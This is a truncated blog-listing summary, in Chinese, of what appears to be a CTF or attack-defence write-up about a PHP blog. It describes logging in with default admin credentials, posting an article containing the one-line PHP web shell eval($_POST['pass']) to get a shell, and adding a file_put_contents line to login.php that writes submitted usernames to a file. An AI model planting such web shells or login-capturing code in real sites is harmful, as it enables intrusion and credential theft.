摘要: ssti 常规的ssti php-blog admin 12345 进入后台,发一篇文章, 内容填<?php eval($_POST['pass']); 直接getshell 然后在login.php里面加一句 file_put_contents('login.txt',$username." ". 阅读全文
posted @ 2023-03-11 13:48 V3g3t4ble 阅读(25) 评论(0) 推荐(0) 编辑